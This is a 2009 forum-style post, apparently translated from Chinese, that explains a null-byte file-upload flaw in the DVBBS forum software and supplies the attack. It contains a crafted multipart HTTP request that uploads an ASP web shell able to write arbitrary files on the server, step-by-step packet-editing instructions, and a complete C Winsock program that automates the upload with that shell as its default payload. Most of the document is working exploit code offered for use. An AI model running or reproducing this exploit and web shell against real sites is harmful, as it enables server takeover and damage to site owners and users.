
The DVBBS (动网论坛) file-upload vulnerability: how it works and the attack code

Published: Thursday, 12 February 2009


I have been fairly busy lately and have had little time to contribute to the group (not that I have the skill, heh). A while ago 小猪 (for his current comparison of BBS security, see http://wvw.ttian.net/forum/viewtopic.php?id=269) mentioned that DVBBS had an arbitrary-file-upload vulnerability; I did not quite follow it at the time. But everyone on the NB forum has been discussing it recently, so I looked into it and found that the vulnerability is real and very serious: in 小猪's words, it kills every DVBBS version up to and including 7.0 SP2. Some people already know the attack method, but there are still problems with how it is being done, so below I walk through this DVBBS vulnerability. (I am not sure whether I will get cursed for this; the hole really is huge.)

First, the DVBBS code that handles file uploads (the page copy had stripped keywords such as if/set/case/else and mangled the onclick links; they are restored here):

'=component-free upload (upload_0)
sub upload_0()
set upload=new UpFile_Class ''create the upload object
upload.GetDate ((Forum_Setting(56))*1024) ''read the upload data (no size limit)
iCount=0

if upload.err > 0 then
select case upload.err
case 1
Response.Write "Please choose a file to upload first [ <a href=# onclick=history.go(-1)>Go back</a> ]"
case 2
Response.Write "The image exceeds the size limit of "&Forum_Setting(56)&"K [ <a href=# onclick=history.go(-1)>Go back</a> ]"
end select
exit sub
else
formPath=upload.form("filepath")
''append (/) to the directory
if right(formPath,1)<>"/" then formPath=formPath&"/"

for each formName in upload.file ''iterate over every uploaded file
set file=upload.file(formName) ''create a file object
if file.filesize<100 then
response.write "Please choose an image to upload first [ <a href=# onclick=history.go(-1)>Go back</a> ]"
response.end
end if

fileExt=lcase(file.FileExt)
if CheckFileExt(fileEXT)=false then
response.write "Invalid file format [ <a href=# onclick=history.go(-1)>Go back</a> ]"
response.end
end if

randomize
ranNum=int(90000*rnd)+10000
filename=formPath&year(now)&month(now)&day(now)&hour(now)&minute(now)&second(now)&ranNum&"."&fileExt
if file.FileSize>0 then ''FileSize > 0 means the part carried file data
file.SaveToFile Server.mappath(filename) ''save the file
' response.write file.FilePath&file.FileName&" ("&file.FileSize&") => "&formPath&File.FileName&" OK!<br>"
response.write "<script>parent.document.forms[0].myface.value='"&FileName&"'</script>"
iCount=iCount+1
end if
set file=nothing
next
set upload=nothing
session("upface")="done"
Htmend iCount&" file(s) uploaded."
end if
end sub

Notice this line in the code above:
filename=formPath&year(now)&month(now)&day(now)&hour(now)&minute(now)&second(now)&ranNum&"."&fileExt
Here filename is the name the file is saved under. It is built from the upload time, and its extension is the extension of the file submitted in the form. Since the submitted file's type is checked, uploading an ASP file directly is clearly not possible. So where does the extension actually come from? In reg_upload.asp we find this code:
<form name="form" method="post" action="upfile.asp" enctype="multipart/form-data" >
<input type="hidden" name="filepath" value="uploadFace">
<input type="hidden" name="act" value="upload">
<input type="file" name="file1">
<input type="hidden" name="fname">
<input type="submit" name="Submit" value="上传" onclick="parent.document.forms[0].Submit2.disabled=true;">
</form>
So now we know: the decision is made from the values of the file1 and fname form fields. That means submitting our ASP file straight from the page will not work either. It is a different story, though, if we build the packet ourselves. The method proposed by 欲望的翼 is exactly that: construct the request by hand and set the file1 and fname values to a legitimate file name. That bypasses the file-type check.

Of course, the main problem is not there. If all we wanted was to upload that code, changing the file name would be enough. What we need is for the uploaded file to be saved with an .asp name so that we can actually use it. The key is this line:
formPath&year(now)&month(now)&day(now)&hour(now)&minute(now)&second(now)&ranNum&"."&fileExt
This line concatenates the pieces into one string, and the only piece we control is the formPath parameter. In C-style string handling, a string ends at the first '\0' byte. VBScript strings are length-counted, so the concatenation itself keeps everything, but when Server.mappath and the save call hand the result down to the Win32 file API underneath, which reads C strings, everything after the '\0' is dropped. So if we construct the save path so that the system believes a path like "uploadface\zwell.asp" has already ended there, the timestamp and extension appended after it no longer matter, and the file is saved under the name we chose. All we have to do, then, is set the form's filepath field in our constructed packet to a string like uploadface\zwell.asp'\0' and send it. (The underlying mistake is that upload_0 trusts a hidden form field for the save directory at all; the null byte is just what turns that into an arbitrary file name.)



First let's look at the packet format (most people on the forum seem to use WSockExpert; I use IRIS, which I find a bit more professional, ^_^):


POST /forum/upfile.asp HTTP/1.1
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, */*
Referer: http://192.168.10.101/a.asp?a=http://uyee.com/forum/upfile.asp
Accept-Language: zh-cn
Content-Type: multipart/form-data; boundary=---------------------------7d4a325500d2
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; MyIE2; .NET CLR 1.1.4322; .NET CLR 1.0.3705)
Host: uyee.com
Content-Length: 1593
Connection: Keep-Alive
Cache-Control: no-cache
Cookie: ASPSESSIONIDQCAQBAQT=NBDJCEFCMIICLJBJKHKMHJEF

-----------------------------7d4a325500d2
Content-Disposition: form-data; name="filepath"

uploadFace\zwell.asp
-----------------------------7d4a325500d2
Content-Disposition: form-data; name="act"

upload
-----------------------------7d4a325500d2
Content-Disposition: form-data; name="file1"; filename="C:\1.gif"
Content-Type: text/plain

<%dim objFSO%>
<%dim fdata%>
<%dim objCountFile%>
<%on error resume next%>
<%Set objFSO = Server.CreateObject("Scripting.FileSystemObject")%>
<%if Trim(request("syfdpath"))<>"" then%>
<%fdata = request("cyfddata")%>
<%Set objCountFile=objFSO.CreateTextFile(request("syfdpath"),True)%>
<%objCountFile.Write fdata%>
<%if err =0 then%>
<%response.write "<font color=red>save Success!</font>"%>
<%else%>
<%response.write "<font color=red>Save UnSuccess!</font>"%>
<%end if%>
<%err.clear%>
<%end if%>
<%objCountFile.Close%>
<%Set objCountFile=Nothing%>
<%Set objFSO = Nothing%>
<%Response.write "<form action='' method=post>"%>
<%Response.Write "<input type=text name=syfdpath width=32 size=50>"%>
<%Response.Write "<br>"%>
<%=server.mappath(Request.ServerVariables("SCRIPT_NAME"))%>
<%Response.write "<br>"%>
<%Response.write "<textarea name=cyfddata cols=80 rows=10 width=32></textarea>"%>
<%Response.write "<input type=submit value=save>"%>
<%Response.write "</form>"%>
-----------------------------7d4a325500d2
Content-Disposition: form-data; name="fname"

C:\1.gif
-----------------------------7d4a325500d2
Content-Disposition: form-data; name="Submit"

上传
-----------------------------7d4a325500d2--

The packet above is what I debugged on Win2003. As explained earlier, only a few places need changing:
1. Content-Disposition: form-data; name="file1"; filename="C:\1.gif"
2. Content-Disposition: form-data; name="fname"

C:\1.gif
3. The most important part: uploadFace\zwell.asp. How do you add the null byte? UltraEdit is a good way: open the packet in hex mode. The '\0' occupies one position, so first type a space after the name, then change that space's byte (20) to 00 in UltraEdit.

As for the headers at the top, just take them from the capture tool; any capture will do. The one line that really matters is this:
Content-Length: 1593
Many people's tests fail because this value is wrong. It is easy to compute: count from the first "-----------------------------7d4a325500d2" up to and including "-----------------------------7d4a325500d2--\r\n\r\n". Each "\r\n" is a line break and counts as two bytes. People on the forum say "just add the right number", which is not wrong, but you still have to count it, and while that is fine for a short payload, what about a long one? :) A simple method: open Notepad, paste the part to be counted, save it, and the size shown in the file's properties is the answer; it is never off. Two things to watch, though: the trailing line breaks must be included (many people fail because they did not copy them), and the embedded '\0' counts as one byte, as do multibyte characters such as 上传 by their encoded length rather than by character count.

Having written all this, you can see that editing the packet by hand every time is a pain, so a tool was needed, heh. I will not go into detail; part of the code follows (keywords and escape sequences that the page copy had stripped are restored):
#include <winsock2.h>
#include <stdio.h>
#include "Resource.h"

#pragma comment(lib,"ws2_32.lib")

HINSTANCE g_hInst;
HWND g_hWnd;
HWND m_up;
HWND m_host;
HWND m_webpath;
HWND m_path;
HWND m_filename;
HWND m_upload;
DWORD m_theadid;
BYTE sendbuf[10000];
char host[80];          // host address
char bbspath[50];       // forum path

char uppath[20];        // upload directory
char upfilename[50];    // name to save the uploaded file under
char upfiledata[8000];  // uploaded file content
int sendsize;           // total number of bytes to send
int realsndsize = 0;    // Content-Length of the multipart body
char snddata[8000];
char mm[] =             // default payload: the ASP file writer shown earlier (sized by its initializer)
"<%dim objFSO%>\r\n"
"<%dim fdata%>\r\n"
"<%dim objCountFile%>\r\n"
"<%on error resume next%>\r\n"
"<%Set objFSO = Server.CreateObject(\"Scripting.FileSystemObject\")%>\r\n"
"<%if Trim(request(\"syfdpath\"))<>\"\" then%>\r\n"
"<%fdata = request(\"cyfddata\")%>\r\n"
"<%Set objCountFile=objFSO.CreateTextFile(request(\"syfdpath\"),True)%>\r\n"
"<%objCountFile.Write fdata%>\r\n"
"<%if err =0 then%>\r\n"
"<%response.write \"<font color=red>save Success!</font>\"%>\r\n"
"<%else%>"
"<%response.write \"<font color=red>Save UnSuccess!</font>\"%>\r\n"
"<%end if%>\r\n"
"<%err.clear%>\r\n"
"<%end if%>"
"<%objCountFile.Close%>\r\n"
"<%Set objCountFile=Nothing%>\r\n"
"<%Set objFSO = Nothing%>"
"<%Response.write \"<form action='' method=post>\"%>\r\n"
"<%Response.Write \"<input type=text name=syfdpath width=32 size=50>\"%>\r\n"
"<%Response.Write \"<br>\"%>\r\n"
"<%=server.mappath(Request.ServerVariables(\"SCRIPT_NAME\"))%>\r\n"
"<%Response.write \"<br>\"%>\r\n"
"<%Response.write \"<textarea name=cyfddata cols=80 rows=10 width=32></textarea>\"%>\r\n"
"<%Response.write \"<input type=submit value=save>\"%>\r\n"
"<%Response.write \"</form>\"%>\r\n";

// get a control's text (static buffer, so the result is valid until the next call)
char *gettext(HWND chwnd)
{
    static char tmpbuf[10000];
    SendMessage(chwnd, WM_GETTEXT, (WPARAM)sizeof(tmpbuf), (LPARAM)tmpbuf);
    return tmpbuf;
}

// set a control's text
void settext(HWND chwnd, char *text)
{
    SendMessage(chwnd, WM_SETTEXT, (WPARAM)0, (LPARAM)text);
}

char *itos(int data)
{
    static char tmp[16];
    sprintf(tmp, "%d", data);
    return tmp;
}

// upload thread
DWORD WINAPI uploadthread(LPVOID param)
{
    SOCKET s;
    sockaddr_in sin;
    struct hostent *hp;
    unsigned long addr = INADDR_NONE;
    int sendsz, n;
    char recvbuf[10000];

    s = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP);

    ZeroMemory((void *)&sin, sizeof(sin));

    hp = gethostbyname(gettext(m_host));
    if (!hp)
        addr = inet_addr(gettext(m_host));
    if ((!hp) && (addr == INADDR_NONE))
    {
        MessageBox(g_hWnd, "Unable to resolve host", "sendbuf", MB_OK);
        return 0;
    }
    if (hp != NULL)
        memcpy(&(sin.sin_addr), hp->h_addr, hp->h_length);
    else
        sin.sin_addr.s_addr = addr;

    sin.sin_port = htons(80);
    sin.sin_family = AF_INET;

    strcpy(host, gettext(m_host));
    strcpy(bbspath, gettext(m_webpath));
    strcpy(upfiledata, gettext(m_upload));
    strcpy(uppath, gettext(m_path));
    strcpy(upfilename, gettext(m_filename));

    // Content-Length: the fixed part of the body (578 bytes as measured from the capture)
    // plus the variable fields, plus 1 for the '\0' inside filepath
    realsndsize = 578 + strlen(uppath) + strlen(upfilename) + strlen(upfiledata) + 1;

    sprintf((char *)sendbuf, "POST %s/upfile.asp HTTP/1.1\r\n"
        "Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, */*\r\n"
        "Referer: http://192.168.10.101/a.asp?a=http://uyee.com/forum/upfile.asp\r\n"
        "Accept-Language: zh-cn\r\n"
        "Content-Type: multipart/form-data; boundary=---------------------------7d4a325500d2\r\n"
        "Accept-Encoding: gzip, deflate\r\n"
        "User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; MyIE2; .NET CLR 1.1.4322; .NET CLR 1.0.3705)\r\n"
        "Host: %s\r\n"
        "Content-Length: %d\r\n"
        "Connection: Keep-Alive\r\n"
        "Cache-Control: no-cache\r\n"
        "Cookie: iscookies=0; BoardList=BoardID=Show; ASPSESSIONIDQCAQBAQT=NBDJCEFCMIICLJBJKHKMHJEF\r\n\r\n"
        "-----------------------------7d4a325500d2\r\n"
        "Content-Disposition: form-data; name=\"filepath\"\r\n\r\n"
        "%s\\%s",
        bbspath,
        host,
        realsndsize,
        uppath,
        upfilename);

    // the terminator sprintf wrote right after "uppath\upfilename" is the '\0' we want inside filepath
    sendsize = strlen((char *)sendbuf);
    sendbuf[sendsize] = '\0';

    sprintf(snddata,
        "\r\n"
        "-----------------------------7d4a325500d2\r\n"
        "Content-Disposition: form-data; name=\"act\"\r\n\r\n"
        "upload\r\n"
        "-----------------------------7d4a325500d2\r\n"
        "Content-Disposition: form-data; name=\"file1\"; filename=\"C:\\1.gif\"\r\n"
        "Content-Type: text/plain\r\n\r\n"
        "%s\r\n"
        "-----------------------------7d4a325500d2\r\n"
        "Content-Disposition: form-data; name=\"fname\"\r\n\r\n"
        "C:\\1.gif\r\n"
        "-----------------------------7d4a325500d2\r\n"
        "Content-Disposition: form-data; name=\"Submit\"\r\n\r\n"
        "上传\r\n"
        "-----------------------------7d4a325500d2--\r\n\r\n",
        upfiledata);

    // append the rest of the body after the embedded '\0' (sendbuf is zero-initialised, so strcat starts there)
    strcat((char *)&sendbuf[sendsize + 1], snddata);

    sendsize += strlen(snddata);
    sendsize += 1;   // count the '\0' byte itself

    if (SOCKET_ERROR == connect(s, (struct sockaddr *)&sin, sizeof(sin)))
    {
        MessageBox(g_hWnd, "Connection failed!", "Error:", MB_OK | MB_ICONERROR);
        return 0;
    }
    sendsz = send(s, (char *)sendbuf, sendsize, 0);
    if (sendsz <= 0)
        MessageBox(g_hWnd, "Failed to send data", itos(WSAGetLastError()), MB_OK);
    n = recv(s, recvbuf, sizeof(recvbuf) - 1, 0);
    recvbuf[n > 0 ? n : 0] = '\0';   // terminate before showing the response
    settext(m_upload, recvbuf);
    closesocket(s);
    return 0;
}

void WINAPI On_Command(WPARAM wParam)
{
    switch (LOWORD(wParam))
    {
    case ID_UP:
        CreateThread(NULL, 0, uploadthread, NULL, 0, &m_theadid);
        break;
    case IDCANCEL:
        SendMessage(g_hWnd, WM_CLOSE, (WPARAM)0, (LPARAM)0);
        break;
    }
}

BOOL CALLBACK MainDlgProc(HWND hWndDlg, UINT msg, WPARAM wParam, LPARAM lParam)
{
    switch (msg)
    {
    case WM_INITDIALOG:
        g_hWnd = hWndDlg;
        m_up = GetDlgItem(g_hWnd, ID_UP);
        m_host = GetDlgItem(g_hWnd, IDC_EDIT1);
        m_webpath = GetDlgItem(g_hWnd, IDC_EDIT2);
        m_path = GetDlgItem(g_hWnd, IDC_EDIT3);
        m_upload = GetDlgItem(g_hWnd, IDC_EDIT4);
        m_filename = GetDlgItem(g_hWnd, IDC_EDIT5);
        settext(m_host, "192.168.10.101");
        settext(m_webpath, "/");
        settext(m_path, "uploadface");
        settext(m_filename, "zwell.asp");
        settext(m_upload, mm);
        return TRUE;

    case WM_COMMAND:
        On_Command(wParam);
        break;

    case WM_SIZE:
        break;

    case WM_CLOSE:
        EndDialog(g_hWnd, 0);
        break;
    }
    return FALSE;
}

int APIENTRY WinMain(HINSTANCE hInstance, HINSTANCE hPrevInstance, LPSTR lpCmdLine, int nCmdShow)
{
    WSADATA wsaData;

    g_hInst = hInstance;
    if (WSAStartup(MAKEWORD(1, 1), &wsaData))
    {
        MessageBox(NULL, "Unable to initialize the Winsock DLL\t", "", MB_OK | MB_ICONSTOP);
        return 0;
    }
    DialogBox(g_hInst, MAKEINTRESOURCE(IDD_DIALOG1), NULL, (DLGPROC)MainDlgProc);
    WSACleanup();
    return 1;
}

Built with VC.NET on Windows 2003.
Tested on Windows 2003 and Windows 2000.
